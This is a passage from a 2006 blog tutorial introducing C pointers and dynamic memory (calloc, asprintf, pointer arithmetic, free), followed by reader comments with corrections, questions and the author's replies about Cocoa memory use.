// if the memory we asked for isn't available, return
if ( stringArray == NULL )
{
return 1;
}
// this is what we'll use to move through the
// memory block
char ** currentString = stringArray;
int i;
printf("Initial currentString address: %p\n", currentString);
// now we have to loop through the memory block and
// allocate memory for a string at each "array" slot.
//
// note that the asprintf() function doesn't return
// the string. Instead, it writes directly to the
// slot in the memory block
for ( i = 0; i < count; i++ )
{
asprintf ( currentString, "String %i", i );
currentString++;
printf("currentString address: %p\n", currentString);
}
// reset memory block to the original address.
// In other words, go the beginning of the "array"
currentString = stringArray;
printf("currentString address after reset: %p\n", currentString);
// display the string at this particular slot.
// we have to use the star to de-reference
for ( i = 0; i < count; i++ )
{
printf( "%s\n", *currentString );
currentString++;
}
// reset
currentString = stringArray;
// loop through and free the memory for the
// string at each slot
for ( i = 0; i < count; i++ )
{
free ( *currentString );
currentString++;
}
// now free the memory block itself
free ( stringArray );
}
This should give some output like this:
stringArray address: 0x500120
Initial currentString address: 0x500120
currentString address: 0x500124
currentString address: 0x500128
currentString address: 0x50012c
currentString address: 0x500130
currentString address: 0x500134
currentString address after reset: 0x500120
String 0
String 1
String 2
String 3
String 4
Notice how each time we do currentString++, the address increases by four bytes:
500120 > 500120 > 500124...
This allows us to move through the memory block and treat it as an array. After the loop is complete, we have to "reset" currentString by reassigning its value to that of stringArray:
currentString = stringArray;
If we don't do this and attempt to keep moving through the array, we'll run off the end of the memory block and bad things will happen. This is how bugs are born! There are various tools to avoid these sorts of situations, but those are beyond the scope of this post.
Wrap Up
You should now have at least a basic grasp on how pointers and dynamic memory management work in C. Now go out and experiment on your own. Go on, get.
Intro to C Pointers and Dynamic Memory
Posted Feb 24, 2006 — 38 comments below
Posted Feb 24, 2006 — 38 comments below
Jesper — Feb 25, 06 840
"For example, if we want to hold 20 ***float*** values, we can do this:
void * memoryBlock = malloc ( sizeof(***int***) * 20 );"
Scott Stevenson — Feb 25, 06 842
Ben — Feb 25, 06 846
One question, how often do you find yourself coming back to these first princples when developing for Apple? Especially when there so much more framework and use of Collections is possible? I'm very interested to know, or is this information more about having a solid foundation?
Scott Stevenson — Feb 25, 06 848
I'm glad you find it useful, but it's probably unfair to call this Obj-C. Really more just plain C. :)
One question, how often do you find yourself coming back to these first princples when developing for Apple?
The Foundation classes can replace raw C memory management in many or most cases, but higher-end Cocoa apps often need the speed that you get from working at a lower level. You also may need to know this stuff if you want to use a C library in your app.
Scott Stevenson — Feb 27, 06 851
but higher-end Cocoa apps often need the speed that you get from working at a lower level
What I mean by this is that higher-end apps often need optimization in certain, specific areas of the code, typically found using a profiling tool like Shark. In those places you might be better off using raw C data structures. In most cases, though, you can use Foundation or Core Foundation.
I don't want to leave anyone with the wrong impression. The Foundation storage classes are made up of highly-optimized, industrial-strength code. They fit the bill in the vast majority of cases.
Erik — Feb 27, 06 852
Peter — Apr 10, 06 1096
"int **p" does not declare an array of arrays, nor a two-dimensional array of integers. It declares a pointer to a pointer (to an int). The biggest difference occurs when you pass "p" as a parameter to something, or try to make an "extern" declaration that references it.
Scott: I'd be glad to discuss this at length with you if you want to email me. A good foundation in pointers can set a programmer up for life; a shaky foundation can ruin him for years.
Scott Stevenson — Apr 10, 06 1097
I guess I don't quite agree. Many tutorials will explain pointers in terms of the internal mechanics, but my feeling is that teaching through actual, day-to-day use works better in many cases.
I also don't think the tutorial creates quite as dire a situation as you suggest. This is just meant as a starting point for practical basics. Trying to explain all the details would miss the point.
Also note that I say that notation can be an array of arrays, which I think is true enough for what I set out to do here.
James — Apr 28, 06 1145
I don't know Objective-C at the moment, so I don't know how important it is to get into grittier details earlier, but there you go.
JetLoong — May 09, 06 1196
Now I can do further readings on C books ^^ Thx to u
DRAY — May 11, 06 1216
One question though... ( ...always a catch eh?)
Why is it that I get the following when freeing the "inner array mem" with
// reset
currentString = stringArray;
for...
{
free( *currentString );
currentString++;
}
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f80; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f88; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f8c; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f90; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
*** malloc[9384]: Deallocation of a pointer not malloced: 0x2f94; This could be a double free(), or free() called with the middle of an allocated block; Try setting environment variable MallocHelp to see tools to help debug
thanks again for the great work!
David
DAniel — Jun 28, 06 1426
I'm trying to deal with a little subject , may be you could help me.
Supose I declare a pointer to char and allocate some memory for it, and then, in the middle of the program turns out to be insuficient. how could I enlarge the amount of space allocated for it. for example, when reading unknown length input from the keybord.
Other thing I'm having some problem with is when trying to get the size of an array of pointers to char (char *ptrarr[]) . How could I know how many pointers to char are there ? sizeof(ptrarr) doesn't work.
Henrik N — Oct 20, 06 2113
Galen — Jan 02, 07 2978
This is a really great article. I like your approach. One problem I sill have with pointers is this: Why and when should you use pointers? The copy example was a good one but I have the feeling that that just scratches the surface. Especially when looking at C, C++ or Objective-C code. Pointers seem to be everywhere with absolutely no rhyme or reason. A post on why and when to use pointers would be excellent.
Thanks!!
Scott Stevenson — Jan 02, 07 2980
There are many things you simply cannot do without them. In a sense, pointers are a way for different parts of a program to access the same data. In some cases, they're the only way. In fact, the only thing you can really do without pointers is pass around individual number values or single characters. As soon as you want to use arrays, strings (blocks of text), or Cocoa objects you need pointers.
I think a lot of the confusion from pointers stems from the name. It make it sounds like a pointer is active, that it does something. It really does not. It's just a number that uniquely indentifies a piece of data in memory. It might be easier to actually think of them as unique IDs.
In Cocoa, all object variables are pointers because all of them are stored in the same central location -- in "heap" memory. That is, if you create an object inside a function, it doesn't automatically "go away" at the end of the function. The only way to "reach" the object in heap memory is to refer to it by its unique ID -- the pointer value.
I hope that helps.
Herb Payerl — Jan 22, 07 3380
I think one thing that might deserve further explanation is that the function asprintf actually allocates memory for the strings it creates. The calloc function just reserves space for an array of pointers.
Thanks
Michael Dreher — May 06, 07 4044
I just read this interesting tutorial, coming from cocoadev's intro to C. I already knew basically all the concepts, but I have never seen a better introduction to pointers than yours. Thumbs up!
One mistake I recognized in your tutorial is the following:
Notice how each time we do currentString++, the address increases by four bytes:
500120 > 500120 > 500124...
which does not really increase by four bytes each time.
I really like your way of presenting, like pointers here, or the great introduction to classes and objects in the cocoadev tutorials. And I hope you are using this talent as a professional instructor or teacher. If not, you should strongly consider it.
Michael
Chris Benedict — Sep 26, 07 4654
I really hope to see more tutorials like this that get progressively more in depth, I have really enjoyed going from your "Learn C" tutorial on Cocoa Dev Center to "C Memory and Arrays" now to "C Pointers and Dynamic Memory".
My only question is where can I go now to learn the nitty gritty details and mechanics?
Sean McGinty — Oct 27, 07 4868
Thanks for this post and the others on C. I've recently started exploring Cocoa and it's been quite a while since I've looked at C code. I looked around the web for a refresher but couldn't find one that met my needs until now. Thanks again!
Alison — Mar 29, 08 5689
Many thanks.
Scott Stevenson — Mar 30, 08 5692
Hi, Alison. I'm glad it helped.
Rebecca — Apr 01, 08 5699
I was a little puzzled by what you meant in the final example:
//we have to use the star to de-reference
So I added another printf for my own reference:
printf("currentString is %p\n", currentString);
to compare the difference between currentString and *currentString at this point.
Then I realized currentString is just the address (or the ID, using your words), and *currentString is the actual value contained in the reserved space.
Just thought I should point out the obvious for other dummies like myself.
Dharm — Jun 11, 08 6061
So, apart from using subarrayWithRange 1-[array count], is there a more efficient way to do this like in C style?
Thanks.
Dharm — Jun 11, 08 6062
Scott Stevenson — Jun 12, 08 6065
You can't manually increment the pointer, which is by design. Cocoa supports both NSArray objects and the regular C-style arrays (but Cocoa methods rarely create C-style arrays). NSArrays are much safer to use, partially because they don't let you do things like that.
If you want to create a C-style buffer from an NSArray, you can use NSArray's -getObjects: method. That said, I'd strongly encourage you to reconsider your design before doing that because it's generally bad practice for Cocoa and is not required in most cases. NSArray is incredibly fast, so you really shouldn't need to work about performance in most cases.
Jamie Lemon — Mar 26, 09 6673
Eapen — Jul 11, 09 6828
It is really appreciated.
Eapen — Jul 11, 09 6829
Steffen Frost — Sep 28, 09 6905
In your first example you declare a pointer with...
// declare an int variable and an int pointer variable
int number;
int* pointer; <-- no space between 'int' and '*'
In the second example...
// use the asterisk to _declare_ a pointer
int * numberPointer; <-- space between 'int' and '*'
I compiled and ran both with and without the space between 'int' and '*', and it doesn't make a difference. Little things like this can through you off if you are trying to learn syntax.
Just a nit.
Steffen Frost — Sep 28, 09 6906
... printf( "myNumber: %f\n", myNumber ); printf( "myNumberCopy: %f\n", myNumberCopy ); printf( "myNumberPointer: %f\n", *myNumberPointer ); } Here's the output: myNumber: 2.000000 myNumberCopy: 1.618000 myNumberPointer: 2.000000
Change to
... printf( "myNumber: %f\n", myNumber ); printf( "myNumberCopy: %f\n", myNumberCopy ); printf( "*myNumberPointer: %f\n", *myNumberPointer ); } Here's the output: myNumber: 2.000000 myNumberCopy: 1.618000 *myNumberPointer: 2.000000
Steffen Frost — Sep 28, 09 6907
// declare an int variable and an int pointer variable int number; int* pointer;
My thinking was that a pointer had to be an integer since it was an address in memory, so that made sense. Then in a subsequent example you declared...
main () { float myNumber; float myNumberCopy; float * myNumberPointer; ...
This confused me, since how could an address, i.e. pointer, be a float? Later did I realize that the way to interpret "float* " or "int*" is, respectively, "a float's pointer" or "an integer's pointer". Another way to think of it is "a pointer for a integer variable" or "a pointer for a float variable".
Steffen Frost — Sep 28, 09 6908
#include
main ()
{
int number; // declare an int var
int* pointer; // declare an integer's pointer var
number = 5; //set value for 'number' var
pointer = &number; // pointer is 'addressof' (& operator) of num
printf (" number is: %i\n", number);
printf ("&number is: %p\n", &number); // the 'addressof' the num
printf ("pointer is: %p\n", pointer); // and here
printf ("*pointer is: %i\n", *pointer);
printf ("*&number is: %i\n", *&number); // contents of addressof the variabe
}
Steffen Frost — Sep 28, 09 6909
#include
main ()
{
int number; // declare an int var
number = 5; //set value for 'number' var
printf (" number is: %i\n", number);
printf (" &number is: %p\n", &number); // the 'addressof' the num
printf ("*&number is: %i\n", *&number); // contents of addressof the variabe
}
Bill — Oct 30, 09 6976
This allow the ++ operator to move forward the exact size of an int variable each time
Should be: this allows
Bill — Oct 30, 09 6977
Remember, a string is an array of individual characters, so a an array of strings is a two-dimension array of characters
Should be: so an array...
// In other words, go the beginning of the "array"
Should be: go to the beginning...
Bill Tubbs — Oct 30, 09 6978
When reading the code I just couldn't see how the calloc function could possibly be reserving enough memory. As far as I could see it reserves space for 5 pointers, not space for 5 entire strings. Not knowing that aspintf also allocates memory I couldn't see where the string data was being stored. Since the danger with pointers is overwriting memory that hasnt been allocated this was causing me some consternation!
I found this on the web. Hope it helps:
"The asprintf function is nearly identical to the simpler sprintf, but is much safer, because it dynamically allocates the string to which it sends output, so that the string will never overflow."
Thanks, all the tutorials are excellent.
Write paper — Jan 06, 10 7082
Buy term paper
Nitpicker — Feb 06, 10 7368 | http://theocacao.com/document.page/234 | CC-MAIN-2017-17 | refinedweb | 4,523 | 58.82 |
Introduction
Whenever we build any machine learning model, we feed it with initial data to train the model. And then we feed some unknown data (test data) to understand how well the model performs and generalized over unseen data. If the model performs well on the unseen data, it’s consistent and is able to predict with good accuracy on a wide range of input data; then this model is stable.
But this is not the case always! Machine learning models are not always stable and we have to evaluate the stability of the machine learning model. That is where Cross Validation comes into the picture.
“In simple terms, Cross-Validation is a technique used to assess how well our Machine learning models perform on unseen data”
According to Wikipedia, Cross-Validation is the process of assessing how the results of a statistical analysis will generalize to an independent data set.
There are many ways to perform Cross-Validation and we will learn about 4 methods in this article.
Let’s first understand the need for Cross-Validation!
Why do we need Cross-Validation?
Suppose you build a machine learning model to solve a problem, and you have trained the model on a given dataset. When you check the accuracy of the model on the training data, it is close to 95%. Does this mean that your model has trained very well, and it is the best model because of the high accuracy?
No, it’s not! Because your model is trained on the given data, it knows the data well, captured even the minute variations(noise), and has generalized very well over the given data. If you expose the model to completely new, unseen data, it might not predict with the same accuracy and it might fail to generalize over the new data. This problem is called over-fitting.
Sometimes the model doesn’t train well on the training set as it’s not able to find patterns. In this case, it wouldn’t perform well on the test set as well. This problem is called Under-fitting.
Image Source: fireblazeaischool.in
To overcome over-fitting problems, we use a technique called Cross-Validation.
Cross-Validation is a resampling technique with the fundamental idea of splitting the dataset into 2 parts- training data and test data. Train data is used to train the model and the unseen test data is used for prediction. If the model performs well over the test data and gives good accuracy, it means the model hasn’t overfitted the training data and can be used for prediction.
Let’s dive deep and learn about some of the model evaluation techniques.
1. Hold Out method
This is the simplest evaluation method and is widely used in Machine Learning projects. Here the entire dataset(population) is divided into 2 sets – train set and test set. The data can be divided into 70-30 or 60-40, 75-25 or 80-20, or even 50-50 depending on the use case. As a rule, the proportion of training data has to be larger than the test data.
Image Source: DataVedas
The data split happens randomly, and we can’t be sure which data ends up in the train and test bucket during the split unless we specify random_state. This can lead to extremely high variance and every time, the split changes, the accuracy will also change.
There are some drawbacks to this method:
- In the Hold out method, the test error rates are highly variable (high variance) and it totally depends on which observations end up in the training set and test set
- Only a part of the data is used to train the model (high bias) which is not a very good idea when data is not huge and this will lead to overestimation of test error.
One of the major advantages of this method is that it is computationally inexpensive compared to other cross-validation techniques.
Quick implementation of Hold Out method in Python
from sklearn.model_selection import train_test_split
Output
Train: [50, 10, 40, 20, 80, 90, 60] Test: [30, 100, 70]
Here, random_state is the seed used for reproducibility.
2. Leave One Out Cross-Validation
In this method, we divide the data into train and test sets – but with a twist. Instead of dividing the data into 2 subsets, we select a single observation as test data, and everything else is labeled as training data and the model is trained. Now the 2nd observation is selected as test data and the model is trained on the remaining data.
Image Source: ISLR
This process continues ‘n’ times and the average of all these iterations is calculated and estimated as the test set error.
When it comes to test-error estimates, LOOCV gives unbiased estimates (low bias). But bias is not the only matter of concern in estimation problems. We should also consider variance.
LOOCV has an extremely high variance because we are averaging the output of n-models which are fitted on an almost identical set of observations, and their outputs are highly positively correlated with each other.
And you can clearly see this is computationally expensive as the model is run ‘n’ times to test every observation in the data. Our next method will tackle this problem and give us a good balance between bias and variance.
Quick implementation of Leave One Out Cross-Validation in Python
from sklearn.model_selection import LeaveOneOut
X = [10,20,30,40,50,60,70,80,90,100] l = LeaveOneOut() for train, test in l.split(X): print("%s %s"% (train,test))
Output
]
This output clearly shows how LOOCV keeps one observation aside as test data and all the other observations go to train data.
3. K-Fold Cross-Validation
In this resampling technique, the whole data is divided into k sets of almost equal sizes. The first set is selected as the test set and the model is trained on the remaining k-1 sets. The test error rate is then calculated after fitting the model to the test data.
In the second iteration, the 2nd set is selected as a test set and the remaining k-1 sets are used to train the data and the error is calculated. This process continues for all the k sets.
Image Source: Wikipedia
The mean of errors from all the iterations is calculated as the CV test error estimate.
In K-Fold CV, the no of folds k is less than the number of observations in the data (k<n) and we are averaging the outputs of k fitted models that are somewhat less correlated with each other since the overlap between the training sets in each model is smaller. This leads to low variance then LOOCV.
The best part about this method is each data point gets to be in the test set exactly once and gets to be part of the training set k-1 times. As the number of folds k increases, the variance also decreases (low variance). This method leads to intermediate bias because each training set contains fewer observations (k-1)n/k than the Leave One Out method but more than the Hold Out method.
Typically, K-fold Cross Validation is performed using k=5 or k=10 as these values have been empirically shown to yield test error estimates that neither have high bias nor high variance.
The major disadvantage of this method is that the model has to be run from scratch k-times and is computationally expensive than the Hold Out method but better than the Leave One Out method.
Simple implementation of K-Fold Cross-Validation in Python
from sklearn.model_selection import KFold
X = ["a",'b','c','d','e','f'] kf = KFold(n_splits=3, shuffle=False, random_state=None) for train, test in kf.split(X): print("Train data",train,"Test data",test)
Output
Train: [2 3 4 5] Test: [0 1] Train: [0 1 4 5] Test: [2 3] Train: [0 1 2 3] Test: [4 5]
4. Stratified K-Fold Cross-Validation
This is a slight variation from K-Fold Cross Validation, which uses ‘stratified sampling’ instead of ‘random sampling.’
Let’s quickly understand what stratified sampling is and how is it different from random sampling.
Suppose your data contains reviews for a cosmetic product used by both the male and female population. When we perform random sampling to split the data into train and test sets, there is a possibility that most of the data representing males is not represented in training data but might end up in test data. When we train the model on sample training data that is not a correct representation of the actual population, the model will not predict the test data with good accuracy.
This is where Stratified Sampling comes to the rescue. Here the data is split in such a way that it represents all the classes from the population.
Let’s consider the above example which has a cosmetic product review of 1000 customers out of which 60% is female and 40% is male. I want to split the data into train and test data in proportion (80:20). 80% of 1000 customers will be 800 which will be chosen in such a way that there are 480 reviews associated with the female population and 320 representing the male population. In a similar fashion, 20% of 1000 customers will be chosen for the test data ( with the same female and male representation).
Image Source: stackexchange.com
This is exactly what stratified K-Fold CV does and it will create K-Folds by preserving the percentage of sample for each class. This solves the problem of random sampling associated with Hold out and K-Fold methods.
Quick implementation of Stratified K-Fold Cross-Validation in Python
from sklearn.model_selection import StratifiedKFold
X = np.array([[1,2],[3,4],[5,6],[7,8],[9,10],[11,12]]) y= np.array([0,0,1,0,1,1]) skf = StratifiedKFold(n_splits=3,random_state=None,shuffle=False) for train_index,test_index in skf.split(X,y): print("Train:",train_index,'Test:',test_index) X_train,X_test = X[train_index], X[test_index] y_train,y_test = y[train_index], y[test_index]
Output
Train: [1 3 4 5] Test: [0 2] Train: [0 2 3 5] Test: [1 4] Train: [0 1 2 4] Test: [3 5]
The output clearly shows the stratified split done based on the classes ‘0’ and ‘1’ in ‘y’.
Bias – Variance Tradeoff
When we consider the test error rate estimates, K-Fold Cross Validation gives more accurate estimates than Leave One Out Cross-Validation. Whereas Hold One Out CV method usually leads to overestimates of the test error rate, because in this approach, only a portion of the data is used to train the machine learning model.
When it comes to bias, the Leave One Out Method gives unbiased estimates because each training set contains n-1 observations (which is pretty much all of the data). K-Fold CV leads to an intermediate level of bias depending on the number of k-folds when compared to LOOCV but it’s much lower when compared to the Hold Out Method.
To conclude, the Cross-Validation technique that we choose highly depends on the use case and bias-variance trade-off.
If you have read this article this far, here is a quick bonus for you 👏
sklearn.model_selection has a method cross_val_score which simplifies the process of cross-validation. Instead of iterating through the complete data using the ‘split’ function, we can use cross_val_score and check the accuracy score for the chosen cross-validation method
You can check out my Github for python implementation of different cross-validation methods on the UCI Breast Cancer data from Kaggle.
Below are some of my articles on Machine Learning
Artificial Intelligence Vs Machine Learning Vs Deep Learning -What exactly is the difference between these buzzwords?
A Comprehensive Guide to Data Analysis using Pandas
If you would like to share your thoughts, you can connect with me on LinkedIn.
Happy Learning!
The media shown in this article are not owned by Analytics Vidhya and is used at the Author’s discretion.You can also read this article on our Mobile APP
| https://www.analyticsvidhya.com/blog/2021/05/4-ways-to-evaluate-your-machine-learning-model-cross-validation-techniques-with-python-code/ | CC-MAIN-2021-25 | refinedweb | 2,035 | 59.94 |
I am working on a program with the following requirements:
Write a program to calculate the average of all scores entered between 0 and 100. Use a sentinel-controlled loop variable to terminate the loop. After values are entered and the average calculated, test the average to determine whether an A, B, C, D, or F should be recorded. The scoring rubric is as follows:
A—90-100; B—80-89; C—70-79; D—60-69; F < 60
Here is what I have so far:
using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace PRG205_FinalAssessment_Doyle { class Program { static void Main(string[] args) { int[] marks; int minput = 1, counter = 0, total = 0; float aveg = 0.0f; String Gradeletter = "C"; marks = new int[100]; Console.WriteLine("Enter Student Grade"); while (minput > 0) { minput = Convert.ToInt32(Console.ReadLine()); if (minput >= 0) { marks[counter++] = minput; total += minput; Console.WriteLine("Enter student grade or any negative value to calculate average"); | https://www.daniweb.com/programming/software-development/threads/499381/program-to-calculate-a-grade | CC-MAIN-2018-05 | refinedweb | 164 | 51.34 |
Hi community,
I’m quite used to Java, however I’m starting with Processing.
My aim is to make a realtime slit-scan effect, with the Pi camera (V2) and RPi3.
The following code is working, and I’m yet impressed by the Processing ability to generate a quite constant frame-rate.
Ideally I would like to achive the high frame rate ability of the camera module V2, around 120/180 fps. So my question is in two part.
First, do we have the possibility to change other settings of the camera, such as shutter speed, iso ?
And secondly:
This code is working at about 20fps. It relies on the PImage.copy() method to store the large rotating image buffer and rebuild the time scanned output image.
Is there a better - more efficient strategy for the buffer and reconstruction ?
Thanks a lot, and if Processing team reads this: kudos for this nice job!
import gohai.glvideo.*; GLCapture video; PImage img[]; int imgIndex = 0; PImage imgDest; void setup() { size(256, 256, P2D); // Important to note the renderer // Get the list of cameras connected to the Pi String[] devices = GLCapture.list(); println("Devices:"); printArray(devices); // Get the resolutions and framerates supported by the first camera if (0 < devices.length) { String[] configs = GLCapture.configs(devices[0]); println("Configs:"); printArray(configs); } // this will use the first recognized camera by default //video = new GLCapture(this); // you could be more specific also, e.g. //video = new GLCapture(this, devices[0]); video = new GLCapture(this, devices[0], 256, 256, 90); //video = new GLCapture(this, devices[0], configs[0]); img = new PImage[256]; imgDest = createImage(256, 256, RGB); for (int j = 0; j < img.length; j++) { img[j] = createImage(256, 256, RGB); } video.start(); } void draw() { background(0); // If the camera is sending new data, capture that data if (video.available()) { video.read(); img[imgIndex%256].copy(video, 0,0,256,256,0,0,256,256); for(int i=0; i<256; i++){ imgDest.copy(img[(imgIndex + i)%256], i, 0, 1, 256, i, 0, 1, 256); } imgIndex++; } image(imgDest, 0, 0, 256, 256); } | https://discourse.processing.org/t/need-of-advice-to-improve-glcapture-code-and-large-buffer/6605 | CC-MAIN-2022-27 | refinedweb | 346 | 65.12 |
Github user paul-rogers commented on a diff in the pull request:
--- Diff: common/src/test/java/org/apache/drill/test/DirTestWatcher.java ---
@@ -32,23 +32,50 @@
public class DirTestWatcher extends TestWatcher {
private String dirPath;
private File dir;
+ private boolean deleteDirAtEnd = true;
--- End diff --
Thanks for the Javadoc added previously. Perhaps add a section on how to use this class.
If I need a test directory, do I create an instance of this class? Or, does JUnit do it for
me? If done automagically, how do I get a copy of the directory?
If this is explained in JUnit, perhaps just reference that information. Even better would
be a short example:
> To get a test directory:
```
// Do something here
File myDir = // do something
```
--- | http://mail-archives.apache.org/mod_mbox/drill-dev/201710.mbox/%3C20171018222340.6D2EADFA3C@git1-us-west.apache.org%3E | CC-MAIN-2018-05 | refinedweb | 123 | 57.37 |
Can only save first 28 frames from a video with 31830 frames
I have an issue where I try to save a video into a sequence of images but it is only able to save 28 frames. I have 31830 frames to save but ret becomes a false on the 28th frame. I have checked the video and it is not corrupt. What could the issue be ?
import numpy as np import matplotlib.pyplot as plt import cv2 import sys import time from tqdm import tqdm inp = sys.argv[1] out = sys.argv[2] cap = cv2.VideoCapture(inp) i = 0 pbar = tqdm(total=int(cap.get(cv2.CAP_PROP_FRAME_COUNT))) while(cap.isOpened()): ret, im = cap.read() #print(ret) #break if(ret == True): cv2.imwrite(out + str(i).zfill(10) + ".png", im, [int(cv2.IMWRITE_PNG_COMPRESSION), 0]) pbar.update(1) print(i) i=i+1 else: break
For this kind of task, you should use FFmpeg:
ffmpeg -i myvideo.avi -vf fps=30 img%06d.png
Change fps accordingly. | https://answers.opencv.org/question/201751/can-only-save-first-28-frames-from-a-video-with-31830-frames/?sort=latest | CC-MAIN-2021-21 | refinedweb | 166 | 88.43 |
Many companies send their bills as PDF documents. In most cases, the most useful part of the document is just the bill but unfortunately it will be buried under a whole lot of other pages.
Using PDFOne Java, we can just read the document, take a snap of the page where the bill is located, and save it as an image. This way the images will contain just the bills. Finding the bills in these images will be easier than opening the actual PDF documents.
In this tip, we will see how to accomplish this using one of the overloaded
PdfDocument.saveAsImage() methods.
import java.io.IOException; import com.gnostice.pdfone.PDFOne; import com.gnostice.pdfone.PdfDocument; import com.gnostice.pdfone.PdfException; public class PdfSaveAsImage_Example { static { PDFOne.activate("your-activation-key", "your-product-key"); } public static void main(String[] args) throws IOException, PdfException { // Open a PDF document PdfDocument doc1 = new PdfDocument(); doc1.load("Input_Docs\\sample_doc.pdf"); // Save page 10 as a 96-dpi JPEG image doc1.saveAsImage("jpg", // format "10", // page number "image96_of_page#", // image prefix ".\\Output_Docs", // output directory 96); // DPI // Save page 10 as a 204-dpi JPEG image doc1.saveAsImage("jpg", "10", "image204_of_page#", ".\\Output_Docs", 204); // Close the PDF document doc1.close(); } }
In the above code snippet, we export a PDF page at different resolutions - one at the common 96 dpi and another at a high 204 dpi. Keeping the source document as PDF turns out great for high-resolution image export. Check the results down below.
---o0O0o---). | http://www.gnostice.com/nl_article.asp?id=135&t=Convert_PDF_To_High-Resolution_Images_Using_Java | CC-MAIN-2014-10 | refinedweb | 248 | 51.44 |
(asthetics) I know it can be done easily with a windows project, but how can you make a program invisible? even without iostream header file, the console box still appears. Any way to make it go away?
This is a discussion on Console boxes within the C++ Programming forums, part of the General Programming Boards category; (asthetics) I know it can be done easily with a windows project, but how can you make a program invisible? ...
(asthetics) I know it can be done easily with a windows project, but how can you make a program invisible? even without iostream header file, the console box still appears. Any way to make it go away?
Behind me lies another fallen soldier...
On the Win32 platform, one solution is to design the process as a service.
Kuphryn
Or start the console application using this:Or start the console application using this:Code:#include <windows.h> #include <iostream> using namespace std; bool HideConsoleWindow() { char title[MAX_PATH]; HWND hwnd; // NOTE: if you have 2000/XP and latest Platform SDK, then you can simply // call GetConsoleWindow() and pass that to ShowWindow() if (GetConsoleTitleA(title, sizeof(title)) && ((hwnd = FindWindowA(NULL, title)) != NULL) && ShowWindow(hwnd, SW_HIDE)) { return true; }//if return false; }//HideConsoleWindow int main() { if (HideConsoleWindow()) MessageBoxA(NULL, "You can't see me!", "<Nelson>:Ha-Ha", MB_OK); else cout << "Didn't work, ec = " << GetLastError() << endl; return 0; }//main
ggggCode:bool StartAppHidden(char *command) { PROCESS_INFORMATION ProcInfo = {0}; STARTUPINFO si = {0}; si.cb = sizeof(STARTUPINFO); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; BOOL bSuccess; bSuccess = CreateProcessA(NULL, command, NULL, NULL, FALSE, 0, NULL, NULL, &si, &ProcInfo); if (!bSuccess) return false; CloseHandle(ProcInfo.hThread); CloseHandle(ProcInfo.hProcess); return true; }//StartAppHidden
There is an easy answer, if you are using Dev-C++ go to "Linker" and write Yes instead of No on the "Make a console window"
It makes sense if it's impossible, MS-DOS doesn't have multitasking capabilities, and what I really want to do is make a simple program have no console box. Yea, I am using Dev-C++, and I already did the windows deal. But whenever I include Windows.h my compile time doubles, but I guess I'll just make it winapp.
Behind me lies another fallen soldier...
>> ...MS-DOS doesn't have multitasking capabilities...
Dev-C++ creates 32bit console applications will all the capabilities of 32bit GUI applications. The only difference is that the OS creates a console window for you and hooks up standard input and standard output to that window.
Any technique you use will require windows.h, so you might as well do it the WinMain() way.
gg | http://cboard.cprogramming.com/cplusplus-programming/55388-console-boxes.html | CC-MAIN-2014-49 | refinedweb | 436 | 56.45 |
mmap, mmap64
mmap(), mmap64()
Map a memory region into a process's address space
Synopsis:
#include <sys/mman.h> void * mmap( void * addr, size_t len, int prot, int flags, int fildes, off_t off ); void * mmap64( void * addr, size_t len, int prot, int flags, int fildes, off64_t off );
Arguments:
- addr
- NULL, or a pointer to where you want the object to be mapped in the calling process's address space.
- len
- The number of bytes to map into the caller's address space. It can't be 0.
- prot
- The access capabilities that you want to use for the memory region being mapped. You can combine.
- flags
- Flags that specify further information about handling the mapped region. POSIX defines the following:
- MAP_PRIVATE
- MAP_SHARED
- MAP_FIXED
The following are Unix or QNX Neutrino.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The mmap() function maps a region within the object specified by filedes, beginning at off and continuing for len, into the caller's address space and returns the location. The object that you map from can be one of the following:
- a file, opened with open()
- a shared memory object, opened with shm_open()
- a typed memory object, opened with posix_typed_mem_open()
- physical memory — specify NOFD for fildes
If you want to map a device's physical memory, use mmap_device_memory() instead of mmap(); if you want to map a device's registers, use mmap_device_io().
If fildes isn't NOFD, you must have opened the file descriptor for reading, no matter what value you specify for prot; write access is also required for PROT_WRITE if you haven't specified MAP_PRIVATE.
The mapping is as shown below.
Mapping memory with mmap().
Typically, you don't need to use addr; you can just pass NULL instead. If you set addr to a non-NULL value, whether the object is mapped depends on whether or not you set MAP_FIXED in flags:
- MAP_FIXED is set
- The object is mapped to the address in addr, or the function fails.
- MAP_FIXED isn't set
- The value of addr is taken as a hint as to where to map the object in the calling process's address space. The mapped area won't overlay any current mapped areas.
There are two parts to the flags parameter. The first part is a type (masked by the MAP_TYPE bits), which QNX Neutrino.
- MAP_FIXED
- Map the object to the address specified by addr. If this area is already mapped, the call changes the existing mapping of the area.
A memory area being mapped with MAP_FIXED is first unmapped by the system using the same memory area. See munmap() for details.
- MAP_LAZY
- Delay acquiring system memory, and copying or zero-filling the MAP_PRIVATE or MAP_ANON pages, until an access to the area has occurred. If you set this flag, and there's no system memory at the time of the access, the thread gets a SIGBUS with a code of BUS_ADRERR. This flag is a hint to the memory manager.
For anonymous shared memory objects (those created via mmap() with MAP_ANON | MAP_SHARED and a file descriptor of -1), a MAP_LAZY flag implicitly sets the SHMCTL_LAZY flag on the object (see shm_ctl()).
- MAP_NOINIT
- When specified, the POSIX requirement that the memory be zeroed is relaxed. QNX Neutrino Programmer's Guide..:
- The address from off for len bytes is invalid for the requested object.
-.; }
Classification:
mmap() is POSIX 1003.1 MF|SHM|TYM; mmap64() is Large-file support
See also:
mmap_device_io(), mmap_device_memory(), munmap(), msync(), posix_typed_mem_open(), setrlimit(), shm_open()
“Shared memory” and “Typed memory” in the Interprocess Communication (IPC) chapter of the System Architecture guide | http://www.qnx.com/developers/docs/6.4.1/neutrino/lib_ref/m/mmap.html | CC-MAIN-2017-17 | refinedweb | 608 | 62.48 |
Introduction
